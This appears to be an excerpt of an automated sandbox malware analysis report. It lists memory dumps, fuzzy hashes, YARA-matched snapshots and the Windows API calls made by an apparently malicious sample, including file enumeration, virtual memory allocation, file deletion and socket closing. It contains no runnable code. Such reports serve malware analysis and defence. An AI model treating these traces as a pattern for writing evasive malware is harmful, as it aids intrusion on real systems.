                                                                                                                                                  • Opcode Fuzzy Hash: 01cd92d4f572f8ae4a1fa56cc8216ec592df8c87cebd9eeef30c0c51ee803700
                                                                                                                                                  • Instruction Fuzzy Hash: 1890022124140806D281715984147070406D7D1701F55C012B5028554DC6168B696BB2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: faafd7e69edc78380b4437f4fee155f42c28fb11bef880f10b44e37d73fd9334
                                                                                                                                                  • Instruction ID: c7fa29ac9f980d0685d23db8d529316bfaa5e36bf7246f018ddd6094e644b56d
                                                                                                                                                  • Opcode Fuzzy Hash: faafd7e69edc78380b4437f4fee155f42c28fb11bef880f10b44e37d73fd9334
                                                                                                                                                  • Instruction Fuzzy Hash: 4D90022120184446D28172594804B0F4505D7E2302F95C01AB915A554CC9158A595B22
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c0f7f41eac6a06da4e26967e5a44c975ae53fea27661038157718af5ae7360e0
                                                                                                                                                  • Instruction ID: 21c51f7ef29b13a5fe23ae6f8ef5884c9bf8a6dff4fa17c5de9d664cb37bfaa0
                                                                                                                                                  • Opcode Fuzzy Hash: c0f7f41eac6a06da4e26967e5a44c975ae53fea27661038157718af5ae7360e0
                                                                                                                                                  • Instruction Fuzzy Hash: 1290022124545106D291715D44046164405F7E1301F55C022B5818594DC5558A596722
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 30a76e0f1cee2079012d40b14aac9061204a38bb50a0dd8a710ce88ed2c0a4cc
                                                                                                                                                  • Instruction ID: a5084bc6bad30e0ee6eb05e3e24b0278c4518a6e0bd8945709fbd791d91ad68f
                                                                                                                                                  • Opcode Fuzzy Hash: 30a76e0f1cee2079012d40b14aac9061204a38bb50a0dd8a710ce88ed2c0a4cc
                                                                                                                                                  • Instruction Fuzzy Hash: EC90023120240146968172595804A4E4505D7E2302B95D416B5019554CC9148A655722
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1d66b8ad11d0a0b646b68086c54811abb0dbecf2b03ed58af5e03af961c51acf
                                                                                                                                                  • Instruction ID: fb9db82e1be6a39cbbbf6dde6c33db016ea35fc88c7bf50e935412d81ece2f8c
                                                                                                                                                  • Opcode Fuzzy Hash: 1d66b8ad11d0a0b646b68086c54811abb0dbecf2b03ed58af5e03af961c51acf
                                                                                                                                                  • Instruction Fuzzy Hash: F890023520140406D651715958046460446D7D1301F55D412B5428558DC6548AA5A622
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                  • Instruction ID: 3614c6967db129892fb6dea05f8850075bcc06a13b5a958a712c0f69544c3b20
                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  Strings
                                                                                                                                                  • ExecuteOptions, xrefs: 018746A0
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01874742
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01874725
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01874655
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01874787
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018746FC
                                                                                                                                                  • Execute=1, xrefs: 01874713
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018702BD
                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018702E7
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 0187031E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Resource at %p, xrefs: 01877B8E
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01877B7F
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 01877BAC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187728C
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01877294
                                                                                                                                                  • RTL: Resource at %p, xrefs: 018772A3
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 018772C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction ID: 16b8bee1fe64caaf752099486a8fce251b4751ebada60b9f8e1509927acf0865
                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction Fuzzy Hash: 0591B171E0021E9BEB24DF6DC880ABEBBA5FF45720F54461AE955E72C0EF349B408761
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                  • Opcode ID: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                                                  • Instruction ID: edfeba0cf8178264d4aefce5bf34fbe780d76d64a064d5afda95e1f3ea3a6657
                                                                                                                                                  • Opcode Fuzzy Hash: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                                                  • Instruction Fuzzy Hash: FD811C71D012699BDB768B58CC44BEAB7B9AB08714F0041DAEA1DF7281D7345F84CF61

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:3
                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                  execution_graph 13082 7cdfbfd 13083 7cdfc17 13082->13083 13084 7cdfc26 closesocket 13083->13084

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 7cdfbfd-7cdfc34 call 7cb72cd call 7ce07dd closesocket
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7c90000_UFUUPGsATdE.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: closesocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2781271927-0
                                                                                                                                                  • Opcode ID: 67ade5c413cab0fe30b3776136ae7f51ec797ba85e15013a3fedc732ade12a0b
                                                                                                                                                  • Instruction ID: 49003e37bd7eb381dc6dda3bf98f554bb4fc6854fc30fe50c92d50db0f29bdcc
                                                                                                                                                  • Opcode Fuzzy Hash: 67ade5c413cab0fe30b3776136ae7f51ec797ba85e15013a3fedc732ade12a0b
                                                                                                                                                  • Instruction Fuzzy Hash: 84E08C76240204BBC220EA6ACC40EEB73ACDFC9720F104429FE1CA7200C770B91187F2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7c90000_UFUUPGsATdE.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +$"$#$%$*$*B$2[=|$8h$=$=|$@3$A$BeO<$F$O<$Q+$V$W$Z$[O$^.$dS$ic$q$q$/$R
                                                                                                                                                  • API String ID: 0-1089640559
                                                                                                                                                  • Opcode ID: 78bb428ed5f27faa50f8cc867b22df85be3b75b3fa49112115873a28a8a84c86
                                                                                                                                                  • Instruction ID: f81d53fd41ff360f89fd959ed40b5b51ee899d359125dc0064bbbe8373a3994b
                                                                                                                                                  • Opcode Fuzzy Hash: 78bb428ed5f27faa50f8cc867b22df85be3b75b3fa49112115873a28a8a84c86
                                                                                                                                                  • Instruction Fuzzy Hash: 6542CEB0D05229CBEB29CF45CC997EDBBB1BB49308F1085D9C5196B280C7B95AC9CF85

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:2.6%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                                  Signature Coverage:1.6%
                                                                                                                                                  Total number of Nodes:448
                                                                                                                                                  Total number of Limit Nodes:75
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 007AC8F4
                                                                                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 007AC92F
                                                                                                                                                  • FindClose.KERNELBASE(?), ref: 007AC93A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3541575487-0
                                                                                                                                                  • Opcode ID: 2288f4f433a9ea3f8f8dd853e15a060b9a5186db435769348c050ce9dcc08804
                                                                                                                                                  • Instruction ID: ac3dcbb753a35a63caf8a2ee6c6aada2be451e5e8a178dcf9d650f56916e4064
                                                                                                                                                  • Opcode Fuzzy Hash: 2288f4f433a9ea3f8f8dd853e15a060b9a5186db435769348c050ce9dcc08804
                                                                                                                                                  • Instruction Fuzzy Hash: 42317271900248BBDB25DB60CC99FFF777CDF85704F104558F909A7181DB78AA848BA0
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 007B949E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: caa8b8852afe67865b7a9e9d9b40124a3440e7c1202b16a9e74d604c32681882
                                                                                                                                                  • Instruction ID: f4a1cae2c9f7fa19d1d05f7fcbb71c8846fca4a1cf52af977d2ee00aa0a52d80
                                                                                                                                                  • Opcode Fuzzy Hash: caa8b8852afe67865b7a9e9d9b40124a3440e7c1202b16a9e74d604c32681882
                                                                                                                                                  • Instruction Fuzzy Hash: 6B31EEB5A00248AFDB14DF98D881EEFB7B9EF8C314F108219F918A7340D734A811CBA5
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 007B95F9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 6fbe5d8670e2b00c43d50eabcd5977ee6880ea44795e1dbcdf300e99307aa747
                                                                                                                                                  • Instruction ID: 22c088b0e75c294977282d6ac0f8c472260df43f37c6a6256ee04be890abb342
                                                                                                                                                  • Opcode Fuzzy Hash: 6fbe5d8670e2b00c43d50eabcd5977ee6880ea44795e1dbcdf300e99307aa747
                                                                                                                                                  • Instruction Fuzzy Hash: A131E4B5A00209AFDB14DF98D881EEFB7B9EF88314F108119FD18A7341D774A911CBA5
                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(007A1FDB,?,007B818F,00000000,00000004,00003000,?,?,?,?,?,007B818F,007A1FDB,007BB711,007B818F,08758B56), ref: 007B98EB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: 0a2caada5bd4dfcb705f44cf68e427be7a6cb2ebb4c2bdf1eed9b20394365b38
                                                                                                                                                  • Instruction ID: c4ddce9a5f1a58f2b4e65d7b526b1529d0f589f5f77540315a9c8cbf54121641
                                                                                                                                                  • Opcode Fuzzy Hash: 0a2caada5bd4dfcb705f44cf68e427be7a6cb2ebb4c2bdf1eed9b20394365b38
                                                                                                                                                  • Instruction Fuzzy Hash: 172117B5A00249AFDB10DF98DC45FEFB7B9EF88700F108119FA18A7240D774A911CBA5
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeleteFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4033686569-0
                                                                                                                                                  • Opcode ID: 3efa86d7762e1c22732c8334b1ff3184deb055d67d080abe1ab5e71ce3ba9082
                                                                                                                                                  • Instruction ID: e49885d52b4d1881c8d9fda3a6fad774fe3aaefc26b42255833368824d518ee7
                                                                                                                                                  • Opcode Fuzzy Hash: 3efa86d7762e1c22732c8334b1ff3184deb055d67d080abe1ab5e71ce3ba9082
                                                                                                                                                  • Instruction Fuzzy Hash: 6C11A371500648BAEB20EBA4CC46FEB736CEF85714F108519FA08A7181D7747915C7A5
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 007B96F7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 0ba32a543dd1fd00c3caab382bf79cfb2a445aba8da39963bcad958ac1c65b2d
                                                                                                                                                  • Instruction ID: 3530e5b47f76e80033b894bd68e8808ef124605d60d77a33e41ab967b4702d63
                                                                                                                                                  • Opcode Fuzzy Hash: 0ba32a543dd1fd00c3caab382bf79cfb2a445aba8da39963bcad958ac1c65b2d
                                                                                                                                                  • Instruction Fuzzy Hash: 8AE04636240204BBD620FA59DC42F9BB76CDBC6764F414419FA08AB242C770B91186F1
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: da78a623e2fa2b1c06be95eba531b130656956c19358f260aa0917cbc9b03147
                                                                                                                                                  • Instruction ID: d86633c03abf381dac0cdcee5bdbdf748fc633cd520e17f4bb24c3c7e6a3d88b
                                                                                                                                                  • Opcode Fuzzy Hash: da78a623e2fa2b1c06be95eba531b130656956c19358f260aa0917cbc9b03147
                                                                                                                                                  • Instruction Fuzzy Hash: FF900261601600426140B1584D08446604D9BE5305395C125A0956560C8618D95596A9
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: f06e532b7a8bf2b33b5b89452d2cd2893a4ba1b90a02574af2c4354c86bc1c0f
                                                                                                                                                  • Instruction ID: 29027a6bcf28a40922840fad3e3a5835f4892586696a794d3caac353b9c3b153
                                                                                                                                                  • Opcode Fuzzy Hash: f06e532b7a8bf2b33b5b89452d2cd2893a4ba1b90a02574af2c4354c86bc1c0f
                                                                                                                                                  • Instruction Fuzzy Hash: 6390023160590012B140B1584D88586404D9BE4305B55C021E0826554C8A14DA5657A1
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8a5fd20a1a007714168544a4e4773f40fd56988f07a118074fb45488aa2a519e
                                                                                                                                                  • Instruction ID: 0cb9bf16685556d5b3a567ea848ba112583a021b6b8dd51644eb8e3bd048fa89
                                                                                                                                                  • Opcode Fuzzy Hash: 8a5fd20a1a007714168544a4e4773f40fd56988f07a118074fb45488aa2a519e
                                                                                                                                                  • Instruction Fuzzy Hash: 9190023120150402F100B598590C686004D8BE4305F55D021A5426555EC665D9916571
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: cf52fb897f2431167d101aa75b97e70c20c3dc5793f4f9ef5646a40607da3dab
                                                                                                                                                  • Instruction ID: 5e8751f1e1057efc32254bc2777ae8a0f3ef560158ab98852c38f0f8a8487f48
                                                                                                                                                  • Opcode Fuzzy Hash: cf52fb897f2431167d101aa75b97e70c20c3dc5793f4f9ef5646a40607da3dab
                                                                                                                                                  • Instruction Fuzzy Hash: A890023120158802F110B158890878A004D8BD4305F59C421A4826658D8695D9917561
APIs
Memory Dump Source
• Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
• Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
